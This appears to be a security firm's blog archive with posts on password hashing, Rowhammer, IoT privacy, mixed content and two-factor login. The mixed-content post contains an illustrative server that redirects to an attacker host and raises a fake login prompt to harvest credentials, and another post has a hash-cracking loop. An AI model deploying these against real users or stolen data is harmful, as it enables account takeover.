Category Archives: Technical Insight

When departments work at cross-purposes

Back in August, we wrote about how self-discipline can be one of the hardest parts of security, as illustrated by Snowden and the NSA. Just recently, Salon published an article about similar issues that plagued the CIA during the Cold War: How to explain the KGB’s amazing success identifying CIA agents in the field?

So many CIA agents were being uncovered by the Soviets that the CIA assumed there must’ve been double agents…somewhere. Apparently there was a lot of inward-focused paranoia. The truth was a lot more mundane, but also very actionable — not only for the CIA, but for business in general: two departments (in this case, two agencies) in one organization had incompatible, non-coordinated policies:

So how, exactly, did Totrov reconstitute CIA personnel listings without access to the files themselves or those who put them together?

His approach required a clever combination of clear insight into human behavior, root common sense and strict logic.

In the world of secret intelligence the first rule is that of the ancient Chinese philosopher of war Sun Tzu: To defeat the enemy, you have above all to know yourself. The KGB was a huge bureaucracy within a bureaucracy — the Soviet Union. Any Soviet citizen had an intimate acquaintance with how bureaucracies function. They are fundamentally creatures of habit and, as any cryptanalyst knows, the key to breaking the adversary’s cipher is to find repetitions. The same applies to the parallel universe of human counterintelligence.

The difference between Totrov and his fellow citizens was that whereas others at home and abroad would assume the Soviet Union was somehow unique, he applied his understanding of his own society to a society that on the surface seemed unique, but which, in respect of how government worked, was not in fact that much different: the United States.

From an organizational point of view, what’s fascinating is that the problem came from two agencies with different missions having incompatible, uncoordinated policies: the policies for Foreign Service Officers and the policies for CIA officers were different enough that the Soviets could identify individuals who were nominally Foreign Service Officers but were not treated like actual Foreign Service Officers. Pay and policy differentials made it easy to separate real FSOs from CIA officers.

Thus one productive line of inquiry quickly yielded evidence: the differences in the way agency officers undercover as diplomats were treated from genuine foreign service officers (FSOs). The pay scale at entry was much higher for a CIA officer; after three to four years abroad a genuine FSO could return home, whereas an agency employee could not; real FSOs had to be recruited between the ages of 21 and 31, whereas this did not apply to an agency officer; only real FSOs had to attend the Institute of Foreign Service for three months before entering the service; naturalized Americans could not become FSOs for at least nine years but they could become agency employees; when agency officers returned home, they did not normally appear in State Department listings; should they appear they were classified as research and planning, research and intelligence, consular or chancery for security affairs; unlike FSOs, agency officers could change their place of work for no apparent reason; their published biographies contained obvious gaps; agency officers could be relocated within the country to which they were posted, FSOs were not; agency officers usually had more than one working foreign language; their cover was usually as a “political” or “consular” official (often vice-consul); internal embassy reorganizations usually left agency personnel untouched, whether their rank, their office space or their telephones; their offices were located in restricted zones within the embassy; they would appear on the streets during the working day using public telephone boxes; they would arrange meetings for the evening, out of town, usually around 7.30 p.m. or 8.00 p.m.; and whereas FSOs had to observe strict rules about attending dinner, agency officers could come and go as they pleased.

You don’t need to infiltrate the CIA if the CIA and the State Department can’t agree on how to treat their staff and what rules to apply!

One way of looking at the problem is that the diplomats had their own goals, and they set policies appropriate to those goals; by necessity, they didn’t actually know all the goals of their own embassies. It’s not unusual for different subdivisions of an organization to have conflicting goals. The question is how to manage those tensions. What was the point of requiring a nine-year wait after naturalization before someone could work as a Foreign Service Officer? A different executive agency, with higher needs for the integrity of its agents, didn’t consider the wait necessary. Eliminating the wait would’ve eliminated an obvious difference between agents and normal diplomats.

But are we sure the wait wasn’t necessary? It created a large obstacle for adversaries: they would need to think nine years ahead if they wanted to supply their own mole instead of turning one of our diplomats. On the other hand, it created too large an obstacle for ourselves.

Is it more important to defend against foreign agents or to create high-quality cover for our own agents? Two agencies disagreed and pursued their own interests without resolving the disagreement. Either policy could have been effective; having both policies was an information give-away.

How can this sort of issue arise for private businesses? Too often, individual departments set policies that come into conflict with one another. For instance, an IT department may, with perfectly reasonable justification, decide to standardize on a single browser. A second department decides to develop internal tools that rely on browser add-ons like ActiveX or Java applets. When a vulnerability is discovered in those add-ons to the standard browser, the organization finds it is now dependent on an inherently insecure tool. Neither department is responsible for the situation; both acted in good faith within their own arenas. The problem was caused by the lack of anyone responsible for determining how to set policies for the good of the organization as a whole.

Security policies need to be set to take all the organization’s goals into consideration; to do that, someone has to be looking at the whole picture.

Complexity and Storage Slow Attackers Down

Back in 2013, WhiteHat founder Jeremiah Grossman forgot an important password, and Jeremi Gosney of Stricture Consulting Group helped him crack it. Gosney knows password cracking, and he’s up for a challenge, but he knew it’d be futile trying to crack the leaked Ashley Madison passwords. Dean Pierce gave it a shot, and Ars Technica provides some context.

Ashley Madison made mistakes, but password storage wasn’t one of them. This is what came of Pierce’s efforts:

After five days, he was able to crack only 4,007 of the weakest passwords, which comes to just 0.0668 percent of the six million passwords in his pool.

It’s like Jeremiah said after his difficult experience:

Interestingly, in living out this nightmare, I learned A LOT I didn’t know about password cracking, storage, and complexity. I’ve come to appreciate why password storage is ever so much more important than password complexity. If you don’t know how your password is stored, then all you really can depend upon is complexity. This might be common knowledge to password and crypto pros, but for the average InfoSec or Web Security expert, I highly doubt it.

Imagine the average person who doesn’t even work in IT! Logging in to a website feels simpler than it is. It feels like, “The website checked my password, and now I’m logged in.”

Actually, “being logged in” means that the server gave your browser a secret number, AND your browser includes that number every time it makes a request, AND the server has a table of which number goes with which person, AND the server sends you the right stuff based on who you are. Usernames and passwords have to do with whether the server gives your browser the secret number in the first place.
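For the curious, here is a minimal sketch of that bookkeeping on the server side; the names (`sessions`, `logIn`, `whoIs`) are made up for illustration and don’t come from any particular framework:

```typescript
import { randomBytes } from "crypto";

// The server's table of who owns which "secret number" (session token).
const sessions = new Map<string, string>(); // token -> username

// Called once the username and password check out: mint a token,
// remember who it belongs to, and hand it to the browser (e.g. as a cookie).
function logIn(username: string): string {
  const token = randomBytes(32).toString("hex");
  sessions.set(token, username);
  return token;
}

// Called on every later request: the browser sends the token back,
// and the table says who the request is from.
function whoIs(token: string | undefined): string | null {
  if (!token) return null;
  return sessions.get(token) ?? null;
}
```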

It’s natural to assume that “checking your password” means that the server knows your password and compares it to what you typed in the login form. By now, everyone has heard that they’re supposed to have an impossible-to-remember password, but the reasons aren’t usually explained (people have their own problems besides the finer points of PBKDF2 vs. bcrypt).

If you’ve never had to think about it, it’s also natural to assume that hackers guessing your password are literally trying to log in as you. Even professional programmers can make that assumption when password storage is outside their area of expertise. Our clients’ developers sometimes object to findings about password complexity or other brute-force issues because they throttle login attempts, lock accounts after three incorrect guesses, and so on. If attackers really were guessing through the login form, those measures would help, and hackers would be greatly limited by how long each request takes over the network. Account lockouts are probably enough to discourage a person’s acquaintances, but they aren’t a protection against offline password cracking.

Password complexity requirements (include mixed case, include numbers, include symbols) are there to protect you once an organization has already been compromised (like Ashley Madison). In that scenario, password complexity is what you can do to help yourself. Proper password storage is what the organization can do. The key to that is in what exactly “checking your password” means.

When the server receives your login attempt, it runs your password through something called a hash function. When you set your password, the server ran your password through the hash function and stored the result, not your password. The server should only keep the password long enough to run it through the hash function. The difference between secure and insecure password storage is in the choice of hash function.
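As a rough illustration (not anyone’s production code), here is what that set-and-check cycle might look like with a deliberately slow key-derivation function. The sketch uses Node’s built-in scrypt; a bcrypt or Argon2 library would follow the same pattern of storing only the salt and the derived hash:

```typescript
import { randomBytes, scryptSync, timingSafeEqual } from "crypto";

// Setting a password: run it through the slow hash with a random salt,
// then store only the salt and the result -- never the password itself.
function storePassword(password: string): { salt: string; hash: string } {
  const salt = randomBytes(16).toString("hex");
  const hash = scryptSync(password, salt, 64).toString("hex");
  return { salt, hash };
}

// "Checking your password": repeat the same derivation on the login attempt
// and compare the outputs. The stored value alone can't be reversed.
function checkPassword(attempt: string, stored: { salt: string; hash: string }): boolean {
  const hash = scryptSync(attempt, stored.salt, 64);
  return timingSafeEqual(hash, Buffer.from(stored.hash, "hex"));
}
```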

If your enemy is using brute force against you and trying every single thing, your best bet is to slow them down. That’s the thinking behind account lockouts and the design of functions like bcrypt. Hash functions have many applications, and running data through one might be fast or slow, depending on the function. You can use a hash to confirm that large files haven’t been corrupted, and for that purpose it’s good for it to be fast; SHA-256 is well suited to that.

A common mistake is using a deliberately fast hash function, when a deliberately slow one is appropriate. Password storage is an unusual situation where we want the computation to be as slow and inefficient as practicable.

Hackers who’ve compromised an account database have a table of usernames and strings like “$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy”. Cracking a password means making a guess, running it through the hash function, and getting the same string. If you use a complicated password, attackers have to try more guesses; that’s what you can do to slow them down. What organizations can do is choose a hash function that makes each individual check very time-consuming. It’s cryptography, so big numbers are involved. The “only” thing protecting the passwords of Ashley Madison users is that trying even a meaningful fraction of the possible passwords is too time-consuming to be practical.
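To make the attacker’s side concrete, here is a rough sketch of that offline guessing loop, reusing the scrypt-based scheme from the storage sketch above (real dumps, like the bcrypt example string, encode the salt and cost factor inside the hash itself):

```typescript
import { scryptSync } from "crypto";

// The attacker already has the salt and hash from a stolen database,
// so lockouts and network round-trips never enter the picture.
// Each guess costs one run of the hash function -- which is exactly
// why defenders want that function to be slow.
function crack(salt: string, storedHash: string, wordlist: string[]): string | null {
  for (const guess of wordlist) {
    const hash = scryptSync(guess, salt, 64).toString("hex");
    if (hash === storedHash) {
      return guess; // cracked
    }
  }
  return null; // none of the guesses matched; try a bigger wordlist
}
```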

Consumers have all the information they need to learn about password storage best practices and to pressure companies to use them. At least one website is devoted to the cause. It’s interesting that computers are forcing ordinary people, and not just spies, to think about these things.

The Death of the Full Stack Developer

When I got started in computer security, back in 1995, there wasn’t much to it — but there wasn’t much to web applications themselves. If you wanted to be a web application developer, you had to know a few basic skills. These are the kinds of things a developer would need to build a somewhat complex website back in the day:

  • ISP/Service Provider
  • Switching and routing with ACLs
  • DNS
  • Telnet
  • *NIX
  • Apache
  • vi/Emacs
  • HTML
  • CGI/Perl/SSI
  • Berkeley Database
  • Images

It was a pretty long list of things to get started, but if you were determined and persevered, you could learn them in relatively short order. Ideally you might have someone who was good at networking and host security to help you out if you wanted to focus on the web side, but doing it all yourself wasn’t unheard of. It was even possible to be an expert in a few of these, though it was rare to find anyone who knew all of them.

Things have changed dramatically over the 20 years that I’ve been working in security. Now this is what a fairly common stack and provisioning technology might consist of:

  • Eclipse
  • Github
  • Docker
  • Jenkins
  • Cucumber
  • Gauntlt
  • Amazon EC2
  • Amazon AMI
  • SSH keys
  • Duosec 2FA
  • WAF
  • IDS
  • Anti-virus
  • DNS
  • DKIM
  • SPF
  • Apache
  • Relational Database
  • Amazon Glacier
  • PHP
  • Apparmor
  • Suhosin
  • WordPress CMS
  • WordPress Plugins
  • API for updates
  • API to anti-spam filter ruleset
  • API to merchant processor
  • Varnish
  • Stunnel
  • SSL/TLS Certificates
  • Certificate Authority
  • CDN
  • S3
  • JavaScript
  • jQuery
  • Google Analytics
  • Conversion tracking
  • Optimizely
  • CSS
  • Images
  • Sprites

Unlike before, there is literally no one on earth who could claim to understand every aspect of each of those things. They may be familiar with the concepts, but no one can know all of these technologies in depth at once, especially given how quickly they change. That is why we have seen the gradual death of the full-stack developer.

It stands to reason, then, that there has been a similar decline in the number of full-stack security experts. People may know quite a bit about a lot of these technologies, but when it comes down to it, there’s a very real chance that any single security person will become more and more specialized over time — it’s simply hard to avoid specialization, given the growing complexity of modern apps. As a result, we may eventually see the death of the full-stack security person as well.

If that is indeed the case, where does this leave enterprises that need to build secure and operationally functional applications? It means that there will be more and more silos where people handle an ever-shrinking set of features and functionality in progressively greater depth. It means that companies that can augment security or operations in one or more areas will be adopted because there will be literally no other choice; failing to draw on diverse, and potentially external, security and operations expertise will ensure sec-ops failure.

At its heart, this is a result of economic forces – more code needs to be delivered and there are fewer people who understand what it’s actually doing. So you outsource what you can’t know, since there is too much for any one person to know about their own stack. This leads us back to the Internet Services Supply Chain problem as well – can you really trust your service providers when they have to trust other service providers, and so on? All of this highlights the need for better visibility into what is really being tested, as well as the need to find security that scales and to implement operational hardware and software that is secure by default.

Developers and Security Tools

A recent study from NC State found that “the two things that were most strongly associated with using security tools were peer influence and corporate culture.” As a former developer, and as someone who has reviewed the source code of countless web applications, I can say these tools are almost impossible for the average developer to use. Security tools are invariably written for security experts and consultants. Tools produce a huge percentage of false alarms – if you are lucky, you will comb through 100 false alarms to find one legitimate issue.

The false assumption here is that running a tool will result in better security. Peer pressure to do security doesn’t quite make sense because most developers are not trained in security. And since the average tool produces a large number of false alarms, and since the pressure to ship new features as quickly as possible is so high, there will never be enough time, training or background for the average developer to effectively evaluate their own security.

The “evangelist” model the study mentions does seem to work well among some of the WhiteHat Security clients. Anecdotally, I know many organizations that will accept one volunteer per development group as a security “marshal” (something akin to a floor “fire marshal”). That volunteer receives special security training, but ultimately acts as a bridge between his or her individual development team and the security team.

Placing the burden of security entirely on the developers is unfair, as is making them choose between fixing vulnerabilities and shipping new code. One of the dirty secrets of technology is this: even though developers often are shouldered with the responsibility of security, risk and security are really business decisions. Security is also a process that goes far beyond the development process. Developers cannot be solely responsible for application security. Business analysts, architects, developers, quality assurance, security teams, and operations all play a critical role in managing technology risk. And above all, managers (including the C-level team) must provide direction, set levels of tolerable risk, and take ultimate responsibility for the decision to ship new code or fix vulnerabilities. That is, in the end, a business decision.

It Can Happen to Anyone

Earlier this summer, The Intercept published some details about the NSA’s XKEYSCORE program. Those details included some security issues around logging and authorization:

As hard as software developers may try, it’s nearly impossible to write bug-free source code. To compensate for this, developers often rely on multiple layers of security; if attackers can get through one layer, they may still be thwarted by other layers. XKEYSCORE appears to do a bad job of this.

When systems administrators log into XKEYSCORE servers to configure them, they appear to use a shared account, under the name “oper.” Adams notes, “That means that changes made by an administrator cannot be logged.” If one administrator does something malicious on an XKEYSCORE server using the “oper” user, it’s possible that the digital trail of what was done wouldn’t lead back to the administrator, since multiple operators use the account.

There appears to be another way an ill-intentioned systems administrator may be able to cover their tracks. Analysts wishing to query XKEYSCORE sign in via a web browser, and their searches are logged. This creates an audit trail, on which the system relies to ensure that users aren’t doing overly broad searches that would pull up U.S. citizens’ web traffic. Systems administrators, however, are able to run MySQL queries. The documents indicate that administrators have the ability to directly query the MySQL databases, where the collected data is stored, apparently bypassing the audit trail.

These are exactly the same kinds of problems that led to the Snowden leaks:

As a system administrator, Snowden was allowed to look at any file he wanted, and his actions were largely unaudited. “At certain levels, you are the audit,” said an intelligence official.

He was also able to access NSAnet, the agency’s intranet, without leaving any signature, said a person briefed on the postmortem of Snowden’s theft. He was essentially a “ghost user,” said the source, making it difficult to trace when he signed on or what files he accessed.

If he wanted, he would even have been able to pose as any other user with access to NSAnet, said the source.

The NSA obviously had the in-house expertise to design the system differently. Surely they know the importance of logging from their own experience hacking things and responding to breaches. How could this happen?

The most cynical explanation is that the point is not to log everything. Plausible deniability is a goal of intelligence agencies. Nobody can subpoena records that don’t exist. The simple fact of tracking an individual can be highly sensitive (e.g., foreign heads of state).

There’s also a simpler explanation: basic organizational problems. From the same NBC News article:

“It’s 2013 and the NSA is stuck in 2003 technology,” said an intelligence official.

Jason Healey, a former cyber-security official in the Bush Administration, said the Defense Department and the NSA have “frittered away years” trying to catch up to the security technology and practices used in private industry. “The DoD and especially NSA are known for awesome cyber security, but this seems somewhat misplaced,” said Healey, now a cyber expert at the Atlantic Council. “They are great at some sophisticated tasks but oddly bad at many of the simplest.”

In other words, lack of upgrades, “not invented here syndrome,” outsourcing with inadequate follow-up and accountability, and other familiar issues affect even the NSA. Very smart groups of people have these issues, even when they understand them intellectually.

Each individual department of the NSA probably faces challenges very similar to those of a lot of software companies: things need to be done yesterday, and done cheaper. New features are prioritized above technical debt. “It’s just an internal system, and we can trust our own people, anyway…”

Security has costs. Those costs include money, time, and convenience — making a system secure creates obstacles, so there’s always a temptation to ignore security “just this once,” “just for this purpose,” “just for now.” Security is a game in which the adversary tests your intelligence and creativity, yes; but most of all, the adversary tests your thoroughness and your discipline.

Conspiracy Theory and the Internet of Things

I came across this article about smart devices on Alternet, which tells us that “we are far from a digital Orwellian nightmare.” We’re told that worrying about smart televisions, smart phones, and smart meters is for “conspiracy theorists.”

It’s a great case study in not having a security mindset.

This is what David Petraeus said about the Internet of Things at the In-Q-Tel CEO summit in 2012, while he was head of the CIA:

Items of interest will be located, identified, monitored, and remotely controlled through technologies such as radio-frequency identification, sensor networks, tiny embedded servers, and energy harvesters—all connected to the next-generation Internet using abundant, low cost, and high-power computing—the latter now going to cloud computing, in many areas greater and greater supercomputing, and, ultimately, heading to quantum computing.

In practice, these technologies could lead to rapid integration of data from closed societies and provide near-continuous, persistent monitoring of virtually anywhere we choose. “Transformational” is an overused word, but I do believe it properly applies to these technologies, particularly to their effect on clandestine tradecraft. Taken together, these developments change our notions of secrecy and create innumerable challenges—as well as opportunities.

In-Q-Tel is a venture capital firm that invests “with the sole purpose of delivering these cutting-edge technologies to IC [intelligence community] end users quickly and efficiently.” Quickly means 3 years, for their purposes.

It’s been more than 3 years since Petraeus made those remarks, so “Is the CIA meeting its stated goals?” is a fair question. Evil space lizards, by comparison, are an absurd conspiracy theory; this is not.

Smart Televisions

The concerns are confidently dismissed:

Digital Trends points out that smart televisions aren’t “always listening” as they are being portrayed in the media. In fact, such televisions are asleep most of the time, and are only awaken [sic] when they hear a pre-programmed phrase like “Hi, TV.” So, any conversation you may be having before waking the television is not captured or reported. In fact, when the television is listening, it informs the user it is in this mode by beeping and displaying a microphone icon. And when the television enters into listening mode, it doesn’t comprehend anything except a catalog of pre-programmed, executable commands.

Mistaken assumption: gadgets work as intended.

Here’s a Washington Post story from 2013:

The FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years, and has used that technique mainly in terrorism cases or the most serious criminal investigations, said Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, now on the advisory board of Subsentio, a firm that helps telecommunications carriers comply with federal wiretap statutes.

Logically speaking, how does the smart TV know it’s heard a pre-programmed phrase? The microphone must be on so that ambient sounds and the pre-programmed phrases can be compared. We already know the device can transmit data over the internet. The issue is whether or not data can be transmitted at the wrong time, to the wrong people. What if there was a simple bug that kept the microphone from shutting off, once it’s turned on? That would be analogous to insufficient session expiration in a web app, which is pretty common.

The author admits that voice data is being sent to servers advanced enough to detect regional dialects. A low-profile third party contractor has the ability to know whether someone with a different accent is in your living room:

With smart televisions, some information, like IP address and other stored data may be transmitted as well. According to Samsung, its speech recognition technology can also be used to better recognize regional dialects and accents and other things to enhance the user experience. To do all these things, smart television makers like Samsung must employ third-party applications and servers to help them decipher the information it takes in, but this information is encrypted during transmission and not retained or for sale, at least according to the company’s privacy policy.

Can we trust that the encryption is done correctly, and nobody’s stolen the keys? Can we trust that the third parties doing natural language processing haven’t been compromised?

Smart Phones

The Alternet piece has an anecdote of someone telling the author to “Never plug your phone in at a public place; they’ll steal all your information.” Someone can be technically unsophisticated but have the right intuitions. The man doesn’t understand that his phone broadcasts radio waves into the environment, so he has an inaccurate mental model of the threat. He knows that there is a threat.

Then this passage:

A few months back, a series of videos were posted to YouTube and Facebook claiming that the stickers affixed to cellphone batteries are transmitters used for data collection and spying. The initial video showed a man peeling a Near Field Communication transmitter off the wrapper on his Samsung Galaxy S4 battery. The person speaking on the video claims this “chip” allows personal information, such as photographs, text messages, videos and emails to be shared with nearby devices and “the company.” He recommended that the sticker be removed from the phone’s battery….

And that sticker isn’t some nefarious implant the phone manufacturer uses to spy on you; it’s nothing more than a coil antenna to facilitate NFC transmission. If you peel this sticker from your battery, it will compromise your smartphone and likely render it useless for apps that use NFC, like Apple Pay and Google Wallet.

As Ars Technica put it in 2012:

By exploiting multiple security weakness in the industry standard known as Near Field Communication, smartphone hacker Charlie Miller can take control of handsets made by Samsung and Nokia. The attack works by putting the phone a few centimeters away from a quarter-sized chip, or touching it to another NFC-enabled phone. Code on the attacker-controlled chip or handset is beamed to the target phone over the air, then opens malicious files or webpages that exploit known vulnerabilities in a document reader or browser, or in some cases in the operating system itself.

Here, the author didn’t imagine a scenario where someone might get a malicious device within a few centimeters of his phone. “Can I borrow your phone?” “Place all items from your pockets in the tray before stepping through the security checkpoint.” “Scan this barcode for free stuff!”

Smart Meters

Finally, the Alternet piece has this to say about smart meters:

In recent years, privacy activists have targeted smart meters, saying they collect detailed data about energy consumption. These conspiracy theorists are known to flood public utility commission meetings, claiming that smart meters can do a lot of sneaky things like transmit the television shows they watch, the appliances they use, the music they listen to, the websites they visit and their electronic banking use. They believe smart meters are the ultimate spying tool, making the electrical grid and the utilities that run it the ultimate spies.

Again, people can have the right intuitions about things without being technical specialists. That doesn’t mean their concerns are absurd:

The SmartMeters feature digital displays, rather than the spinning-usage wheels seen on older electromagnetic models. They track how much energy is used and when, and transmit that data directly to PG&E. This eliminates the need for paid meter readers, since the utility can immediately access customers’ usage records remotely and, theoretically, find out whether they are consuming, say, exactly 2,000 watts for exactly 12 hours a day.

That’s a problem, because usage patterns like that are telltale signs of indoor marijuana grow operations, which will often run air or water filtration systems round the clock, but leave grow lights turned on for half the day to simulate the sun, according to the Silicon Valley Americans for Safe Access, a cannabis users’ advocacy group.

What’s to stop PG&E from sharing this sensitive information with law enforcement? SmartMeters “pose a direct privacy threat to patients who … grow their own medicine,” says Lauren Vasquez, Silicon Valley ASA’s interim director. “The power company may report suspected pot growers to police, or the police may demand that PG&E turn over customer records.”

Even if you’re not doing anything of ambiguous legality, the first thing you do when you get home is probably turning on the lights. Different appliances use different amounts of power. By reporting power consumption at short, frequent intervals, smart meters can give away a lot about what’s going on inside a house.


That’s not the same as what you were watching on TV, but the content of phone conversations isn’t all that’s interesting about them, either.

It’s hard to trust things.

Hammering at speed limits

Slate has a well-written article explaining an interesting new vulnerability called “Rowhammer.” The white paper is here, and the code repository is here. Here’s the abstract describing the basic idea:

As DRAM has been scaling to increase in density, the cells are less isolated from each other. Recent studies have found that repeated accesses to DRAM rows can cause random bit flips in an adjacent row, resulting in the so called Rowhammer bug. This bug has already been exploited to gain root privileges and to evade a sandbox, showing the severity of faulting single bits for security. However, these exploits are written in native code and use special instructions to flush data from the cache.

In this paper we present Rowhammer.js, a JavaScript-based implementation of the Rowhammer attack. Our attack uses an eviction strategy found by a generic algorithm that improves the eviction rate compared to existing eviction strategies from 95.2% to 99.99%. Rowhammer.js is the first remote software-induced hardware-fault attack. In contrast to other fault attacks it does not require physical access to the machine, or the execution of native code or access to special instructions. As JavaScript-based fault attacks can be performed on millions of users stealthily and simultaneously, we propose countermeasures that can be implemented immediately.

What’s interesting to me is how much computers had to advance to make this situation possible. First, RAM had to be miniaturized enough that adjacent memory cells could interfere with one another. The refresh rate had to be kept as low as possible, because refreshing memory uses up time and power.

Lots more had to happen before this was remotely exploitable via JavaScript. JavaScript wasn’t designed to quickly process binary data, or really even deal with binary data. It’s a high-level language without pointers or direct memory access. Semantically, JavaScript arrays aren’t contiguous blocks of memory like C arrays. They’re special objects whose keys happen to be integers. The third and fourth entries of an array aren’t necessarily next to each other in memory, and each item in an array might have a different type.

Typed Arrays were introduced for performance reasons, to facilitate working with binary data. They were especially necessary for allowing fast 3D graphics with WebGL. Typed Arrays do occupy adjacent memory cells, unlike normal arrays.
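A small TypeScript illustration of the contrast (the sizes and values are arbitrary):

```typescript
// An ordinary array is a flexible object: mixed types, no guaranteed layout.
const plain: unknown[] = [1, "two", { three: 3 }];

// A typed array is a fixed-type view over one contiguous ArrayBuffer,
// which is what makes fast, predictable memory access patterns possible.
const buffer = new ArrayBuffer(1024 * 1024); // 1 MiB of raw bytes
const view = new Uint32Array(buffer);        // every element: 4 bytes, back to back
for (let i = 0; i < view.length; i++) {
  view[i] = 0xffffffff;                      // tight loop of adjacent writes
}
```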

In other words, computers had to get faster, websites had to get fancier, and performance expectations had to go up.

Preventing the attack would kill performance at a hardware level: the RAM would have to spend up to 35% of its time refreshing itself. Short of hardware changes, the authors suggest that browser vendors implement tests for the vulnerability, then throttle JavaScript performance if the system is found to be vulnerable. JavaScript should have to be actively enabled by the user when they visit a website.

It seems unlikely that browser vendors are going to voluntarily undo all the work they’ve done, but they could. It would be difficult to explain to the “average person” that their computer needs to slow down because of some “Rowhammer” business. Rowhammer exists because both hardware and software vendors listened to consumer demands for higher performance. We could slow down, but it’s psychologically intolerable. The known technical solution is emotionally unacceptable to real people, so more advanced technical solutions will be attempted.

In a very similar way, we could make a huge dent in pollution and greenhouse gas emissions if we slowed down our cars and ships by half. For the vast majority of human history, we got by and nobody could travel close to 40 mph, let alone 80 mph.

When you really have information that people want, the safest thing is probably just to use typewriters. Russia already does, and Germany has considered it.

The solutions to security problems have to be technically correct and psychologically acceptable, and it’s the second part that’s hard.

Why is Passive Mixed Content so serious?

One of the most important tools in web security is Transport Layer Security (TLS). It not only protects sensitive information in transit, but also verifies that the content has not been modified. The user can be confident that content delivered via HTTPS is exactly what the website sent, and can exchange sensitive information with the website knowing it won’t be altered or intercepted. However, this increase in security comes with increased overhead, and it is tempting to pay that cost only for the obviously sensitive content. In fact, every resource loaded by a secure page should be similarly protected, not just the ones containing secret content.

Most web security professionals agree that active content — JavaScript, Flash, etc. — should only be sourced in via HTTPS. After all, an attacker can use a Man-in-the-Middle attack to replace non-secure content on the fly. This is clearly a security risk. Active content has access to the content of the Document Object Model (DOM), and the means to exfiltrate that data. Any attack that is possible with Cross-Site Scripting is also achievable using active mixed content.

The controversy begins when the discussion turns to passive content — images, videos, etc. It may be difficult to imagine how an attacker could inflict anything worse than mild annoyance by replacing such content. There are two attack scenarios which are commonly cited.

  • An unsophisticated attacker could, perhaps, damage the reputation of a company by including offensive or illegal content. However, the attack would only be effective while the attacker maintains a privileged position on the network. If the user moves to a different Wi-Fi network, the attacker is out of the loop. It would be easy to demonstrate to the press or law enforcement that the company is not responsible, so the impact would be negligible.
  • If a particular browser’s image parsing process is vulnerable, a highly sophisticated attacker can deliver a specially crafted, malformed file using a passive mixed content vulnerability. In this case, the delivery method is incidental, and the vulnerability lies with the client, rather than the server. This attack requires advanced intelligence about the specific target’s browser, and an un-patched or unreported vulnerability in that specific browser, so the threat is negligible.

However, there is an attack scenario that requires little technical sophistication, yet may result in a complete account takeover. First, assume the attacker has established a privileged position in the network by spoofing a public Wi-Fi access point. The attacker can now return any response to non-encrypted requests coming over the air. From this position, the attacker can return a 302 “Found” temporary redirect to a non-encrypted request for the passive content on the target site. The location header for this request is a resource under their control, configured to respond with a 401 “Unauthorized” response containing a WWW-Authenticate header with a value of Basic realm=”Please confirm your credentials.” The user’s browser will halt loading the page and display an authentication prompt. Some percentage of users will inevitably enter their credentials, which will be submitted directly to the attacker. Even worse, this attack can be automated and generalized to such a degree that an attacker could use commodity hardware to set up a fake Wi-Fi hotspot in a public place and harvest passwords from any number of sites.
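For illustration only, here is roughly what the attacker’s responder might look like, collapsed into a single Node server for brevity; in practice the redirect would be injected on the wire and the trap would live on a host the attacker controls. The paths and hostname here are invented:

```typescript
import { createServer } from "http";

createServer((req, res) => {
  if (req.url === "/images/logo.png") {
    // Step 1: an intercepted mixed-content request gets a temporary redirect
    // to a resource the attacker controls.
    res.writeHead(302, { Location: "http://attacker.example/login-trap" });
    res.end();
  } else if (req.url === "/login-trap") {
    // Step 2: the browser follows the redirect and receives a Basic-auth
    // challenge, which pops a native login prompt over the victim's HTTPS page.
    res.writeHead(401, {
      "WWW-Authenticate": 'Basic realm="Please confirm your credentials"',
    });
    res.end();
  } else {
    res.writeHead(404);
    res.end();
  }
}).listen(8080);
```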

Protecting against this attack is relatively simple. Users should be very suspicious of any unexpected login prompt, especially one that doesn’t look like part of the website. Developers should source in all resources over HTTPS on every secure page.

Web Security for the Tech Impaired: What is two factor authentication?

You may have heard the terms ‘two-factor’ or ‘multi-factor’ authentication. Even if you haven’t, chances are you’ve experienced it without knowing it. The interesting thing is that two-factor authentication is one of the best ways to protect your accounts from being hacked.

So what exactly is it? Traditional authentication asks you for your username and password. This is an example of a system that relies on one factor — something you KNOW — as the sole authentication method for your account. If another person knows your username and password, they can also log in to your account. This is how many account compromises happen: a hacker simply runs through possible passwords for the accounts they want to hack and eventually guesses the correct one, in what is known as a ‘brute force’ attack.

In two-factor authentication, we take the concept a step further. Instead of relying only on something that you KNOW, we also rely on something that you HAVE in your possession. You may have already been doing this and not even realized it — have you logged into your bank or credit card site only to see a message like “This is the first time you have logged in from this machine; we have sent an authentication code to the cell phone number on file for your account — please enter that code along with your password,” or words to that effect? That site is using two-factor authentication. By texting a code to the cell phone number on file to confirm that you are who you say you are, it relies not only on something you KNOW but also on something you HAVE. If an attacker were to steal or guess your username and password, they still couldn’t log in to your account, because they don’t have your phone. Instead, you would receive a text out of the blue for a login you didn’t attempt, and at that moment you would know someone is probably trying to get into your account.

This system works with anything you have. Text messages are the primary means of two-factor authentication, since most people have easy access to a cell phone and it’s easy to read the code and enter it on the site. The system works just as well with a phone call that reads you a code, or with an email. Anything that you HAVE can serve as the second factor. You may notice that most sites will only ask you for this information once; typically a site will ask the very first time you log in from a given device (be it mobile, desktop or tablet). After that, the site remembers which devices you’ve signed in with and allows those devices to log in without requiring the second factor, the auth code. If you typically log in from your home computer and then remember you need to check your balance at work, the site will ask you to log in with two-factor authentication because it does not recognize that device. The thinking is that a hacker is unlikely to break into your house and use your own computer to log in to your account.
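For readers curious about what the website is doing behind the scenes, here is a minimal sketch of the server’s side of an SMS code check. It is deliberately simplified (no code expiry, no rate limiting), and `sendTextMessage` is a stand-in for whatever SMS gateway a real site would use:

```typescript
import { randomInt } from "crypto";

// Hypothetical stand-in for the site's real SMS gateway.
declare function sendTextMessage(phoneNumber: string, body: string): void;

const pendingCodes = new Map<string, string>(); // username -> one-time code

// Step 1: after the password checks out, text a short random code
// to the phone number on file (something you HAVE).
function startSecondFactor(username: string, phoneNumber: string): void {
  const code = String(randomInt(0, 1_000_000)).padStart(6, "0"); // e.g. "042917"
  pendingCodes.set(username, code);
  sendTextMessage(phoneNumber, `Your login code is ${code}`);
}

// Step 2: the login only succeeds if the code typed in matches the one sent.
function finishSecondFactor(username: string, enteredCode: string): boolean {
  const expected = pendingCodes.get(username);
  pendingCodes.delete(username); // codes are single-use
  return expected !== undefined && expected === enteredCode;
}
```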

